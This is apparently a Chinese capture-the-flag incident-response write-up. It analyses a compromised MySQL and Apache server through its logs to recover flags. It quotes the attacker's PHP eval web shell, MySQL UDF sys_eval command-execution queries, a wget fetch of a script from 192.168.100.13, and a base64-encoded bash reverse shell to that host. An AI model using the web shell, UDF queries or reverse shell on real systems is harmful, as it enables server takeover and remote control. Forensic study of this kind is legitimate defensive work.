第二章 日志分析 - mysql 应急响应
1
黑客第一次写入的 shell flag{关键字符串 }
在 /var/www/html 文件夹下看到
root@xuanji:~# ls -lh /var/www/html
total 508K
-rwxrwxrwx. 1 www-data www-data 8.2K Jul 20 2023 Writenote.php
-rw-r--r--. 1 www-data www-data 473K Aug 1 2023 adminer.php
-rwxrwxrwx. 1 www-data www-data 124 Jul 20 2023 common.php
drwxrwxrwx. 1 www-data www-data 79 Jul 20 2023 css
drwxrwxrwx. 1 www-data www-data 39 Jul 20 2023 images
-rwxrwxrwx. 1 www-data www-data 2.6K Jul 20 2023 index.php
drwxrwxrwx. 1 www-data www-data 104 Jul 20 2023 js
-rwxrwxrwx. 1 root root 0 Jul 31 2023 log.php
-rwxrwxrwx. 1 www-data www-data 7.9K Jul 20 2023 search.php
-rw-rw-rw-. 1 mysql mysql 73 Aug 1 2023 sh.php
-rw-rw-rw-. 1 mysql mysql 0 Aug 1 2023 tmpubzil.php
-rw-rw-rw-. 1 mysql mysql 0 Aug 1 2023 tmputsrv.php
-rw-rw-rw-. 1 mysql mysql 0 Aug 1 2023 tmpuvdzm.php
其中 sh.php 文件比较可疑,查看其文件内容
sh.php
1 2 <?php @eval($_POST['a']);?> 4
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b
即可得到答案
flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}
2
黑客反弹 shell 的 ip flag{ip }
在 /var/log/mysql/error.log 中可以看到
230731 10:14:49 [Note] Event Scheduler: Loaded 0 events
230731 10:14:49 [Note] /usr/sbin/mysqld: ready for connections.
Version: '5.5.64-MariaDB-1ubuntu0.14.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)
sh: 1: curl: not found
--2023-08-01 02:14:11-- http://192.168.100.13:771/
Connecting to 192.168.100.13:771... connected.
HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9
Length: unspecified
Saving to: 'index.html'
0K 2.46 =2.0s
2023-08-01 02:14:13 (2.46 B/s) - 'index.html' saved [5]
/tmp/1.sh: line 1: --2023-08-01: command not found
/tmp/1.sh: line 2: Connecting: command not found
/tmp/1.sh: line 3: HTTP: command not found
/tmp/1.sh: line 4: Length:: command not found
/tmp/1.sh: line 5: Saving: command not found
/tmp/1.sh: line 7: 0K: command not found
/tmp/1.sh: line 9: syntax error near unexpected token `('
/tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]'
241001 08:51:01 mysqld_safe Starting mysqld daemon with databases from /var/lib/mysql
说明攻击者曾使用 mysql 执行了系统指令
同时,在 /var/www/html 目录下尝试搜索 mysql 数据库的凭据
root@xuanji:/var/www/html# grep -rnw *.php -e 'root'
common.php:2:$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
得到凭据之后,查看数据库
MariaDB [(none)]> SELECT * FROM mysql.general_log ORDER BY event_time DESC;
Empty set (0.01 sec)
MariaDB [(none)]> SHOW VARIABLES LIKE 'general_log';
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| general_log | OFF |
+---------------+-------+
1 row in set (0.00 sec)
MariaDB [(none)]> SHOW VARIABLES LIKE 'slow_query_log';
+----------------+-------+
| Variable_name | Value |
+----------------+-------+
| slow_query_log | OFF |
+----------------+-------+
1 row in set (0.00 sec)
MariaDB [(none)]> SHOW VARIABLES LIKE 'log_bin';
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| log_bin | OFF |
+---------------+-------+
1 row in set (0.00 sec)
很可惜,mysql 未开启日志记录功能
猜测攻击者并非直接通过 mysql 服务进行命令执行,而是通过 sql 注入来实现的攻击
分析 /var/log/apache2/access.log
192.168.200.2 - - [01/Aug/2023:02:07:40 +0000] "GET /adminer.php HTTP/1.1" 200 2763 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:50 +0000] "POST /adminer.php HTTP/1.1" 302 346 "http://192.168.200.31:8005/adminer.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:50 +0000] "GET /adminer.php?username=root HTTP/1.1" 200 3529 "http://192.168.200.31:8005/adminer.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:52 +0000] "GET /adminer.php?username=root&db=mysql HTTP/1.1" 200 6607 "http://192.168.200.31:8005/adminer.php?username=root" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:52 +0000] "GET /adminer.php?username=root&db=mysql&script=db HTTP/1.1" 200 7170 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:07:54 +0000] "GET /adminer.php?username=root&db=mysql&sql= HTTP/1.1" 200 3570 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:08:05 +0000] "GET /adminer.php?username=root&db=cms&sql= HTTP/1.1" 200 3082 "http://192.168.200.31:8005/adminer.php?username=root&db=mysql&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:08:17 +0000] "POST /sh.php HTTP/1.1" 200 332 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
192.168.200.2 - - [01/Aug/2023:02:08:20 +0000] "POST /sh.php HTTP/1.1" 200 245 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:09:04 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20version()%3B%0A HTTP/1.1" 200 3835 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:09:47 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20load_file(%22%2Fetc%2Fpasswd%22)%3B HTTP/1.1" 200 4287 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20version()%3B%0A" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:07 +0000] "POST /adminer.php?username=root&db=cms&sql=show%20variables%20like%20%27%25plugin%25%27%3B HTTP/1.1" 200 3746 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20load_file(%22%2Fetc%2Fpasswd%22)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:20 +0000] "POST /adminer.php?username=root&db=cms&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3478 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=show%20variables%20like%20%27%25plugin%25%27%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:28 +0000] "GET /adminer.php?username=root&db=cms&sql= HTTP/1.1" 200 3363 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:30 +0000] "GET /adminer.php?username=root HTTP/1.1" 200 3377 "http://192.168.200.31:8005/adminer.php?username=root&db=cms&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:31 +0000] "GET /adminer.php?username=root&sql= HTTP/1.1" 200 2866 "http://192.168.200.31:8005/adminer.php?username=root" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:11:33 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3147 "http://192.168.200.31:8005/adminer.php?username=root&sql=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:00 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 7687 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:34 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 7666 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:12:54 +0000] "POST /adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B HTTP/1.1" 200 3324 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:00 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3740 "http://192.168.200.31:8005/adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:08 +0000] "POST /adminer.php?username=root&sql=select%20*%20from%20func%3B HTTP/1.1" 200 3298 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3761 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:53 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27curl%20192.168.100.13%3A771%27)%3B HTTP/1.1" 200 3800 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:14:11 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20192.168.100.13%3A771%27)%3B HTTP/1.1" 200 3822 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27curl%20192.168.100.13%3A771%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:31 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B HTTP/1.1" 200 3862 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20192.168.100.13%3A771%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:35 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A777%2F1.sh%27)%3B HTTP/1.1" 200 3875 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:43 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20%2Ftmp%2F%27)%3B HTTP/1.1" 200 3975 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A777%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:16:57 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 3889 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:17:05 +0000] "POST /sh.php HTTP/1.1" 200 416 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:17:09 +0000] "POST /sh.php HTTP/1.1" 200 470 "-" "Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01"
192.168.200.2 - - [01/Aug/2023:02:17:10 +0000] "POST /sh.php HTTP/1.1" 200 209 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"
192.168.200.2 - - [01/Aug/2023:02:17:37 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B HTTP/1.1" 200 4116 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B HTTP/1.1" 200 4025 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:27 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4023 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:18:37 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4029 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:19:07 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27bash%20%2Ftmp%2F1.sh%27)%3B HTTP/1.1" 200 4014 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
很好,看起来 sql 注入的流量是通过 GET 方法进行的,使用脚本提取注入操作
from urllib.parse import unquote
with open("./access.log", "r") as f:
data_log = f.read().strip().split("\n")
data_log = [i.split('"') for i in data_log]
data_log = [i for i in data_log if i[1].startswith("POST /adminer.php")]
for i in data_log:
tmp = i[1].split(" ")[1]
tmp = unquote(tmp)
print(tmp)
得到的 sql 注入操作为
/adminer.php
/adminer.php?username=root&db=cms&sql=select version();
/adminer.php?username=root&db=cms&sql=select load_file("/etc/passwd");
/adminer.php?username=root&db=cms&sql=show variables like '%plugin%';
/adminer.php?username=root&db=cms&sql=select * from func;
/adminer.php?username=root&sql=select * from func;
/adminer.php?username=root&sql=select * from func;
/adminer.php?username=root&sql=select sys_eval('whoami');
/adminer.php?username=root&sql=select * from func;
/adminer.php?username=root&sql=select sys_eval('whoami');
/adminer.php?username=root&sql=select sys_eval('curl 192.168.100.13:771');
/adminer.php?username=root&sql=select sys_eval('wget 192.168.100.13:771');
/adminer.php?username=root&sql=select sys_eval('wget -o /tmp/1.sh 192.168.100.13:771/1.sh');
/adminer.php?username=root&sql=select sys_eval('wget -o /tmp/1.sh 192.168.100.13:777/1.sh');
/adminer.php?username=root&sql=select sys_eval('ls /tmp/');
/adminer.php?username=root&sql=select sys_eval('bash /tmp/1.sh');
/adminer.php?username=root&sql=select sys_eval('ls -la /tmp/');
/adminer.php?username=root&sql=select sys_eval('echo YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx|base64 -d');
/adminer.php?username=root&sql=select sys_eval('echo YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx|base64 -d>/tmp/1.sh');
/adminer.php?username=root&sql=select sys_eval('ls -la /tmp/1.sh');
/adminer.php?username=root&sql=select sys_eval('bash /tmp/1.sh');
对其中 Base64 编码的部分进行解码
YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
找到攻击者写入的脚本路径为 /tmp/1.sh
查看文件内容
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
典型的 bash 反弹 shell
flag{192.168.100.13}
3
黑客提权文件的完整路径 md5 flag{md5 } 注 /xxx/xxx/xxx/xxx/xxx.xx
结合题目背景,查看 mysql 的 func 列表
MariaDB [mysql]> select * from func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)
很明显,攻击者采用了 Mysql UDF 提权
定位到这个插件的位置
root@xuanji:/var/www/html# find / -name "mysqludf.so" 2>/dev/null
/usr/lib/mysql/plugin/mysqludf.so
但是这个答案不对,不符合题目提示的规则,进入目录查看所有文件
root@xuanji:/usr/lib/mysql/plugin# ls -lh
total 4.7M
-rw-r--r--. 1 mysql mysql 11K May 16 2019 auth_pam.so
-rw-r--r--. 1 mysql mysql 6.4K May 16 2019 auth_socket.so
-rw-r--r--. 1 mysql mysql 10K May 16 2019 dialog.so
-rw-r--r--. 1 mysql mysql 1.6M May 16 2019 ha_innodb.so
-rw-r--r--. 1 mysql mysql 156K May 16 2019 handlersocket.so
-rw-r--r--. 1 mysql mysql 6.0K May 16 2019 mysql_clear_password.so
-rw-rw-rw-. 1 mysql mysql 11K Aug 1 2023 mysqludf.so
-rw-r--r--. 1 mysql mysql 40K May 16 2019 semisync_master.so
-rw-r--r--. 1 mysql mysql 15K May 16 2019 semisync_slave.so
-rw-r--r--. 1 mysql mysql 55K May 16 2019 server_audit.so
-rw-r--r--. 1 mysql mysql 2.8M May 16 2019 sphinx.so
-rw-r--r--. 1 mysql mysql 11K May 16 2019 sql_errlog.so
-rw-rw-rw-. 1 mysql mysql 34 Aug 1 2023 udf.so
计算 MD5
/usr/lib/mysql/plugin/udf.so
b1818bde4e310f3d23f1005185b973e7
即可得到答案
flag{b1818bde4e310f3d23f1005185b973e7}
4
黑客获取的权限 flag{whoami 后的值 }
直接执行 udf 中的函数即可
MariaDB [(none)]> select * from mysql.func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)
MariaDB [(none)]> select sys_eval("whoami");
+--------------------+
| sys_eval("whoami") |
+--------------------+
| mysql |
+--------------------+
1 row in set (0.01 sec)
即可得到答案
flag{mysql}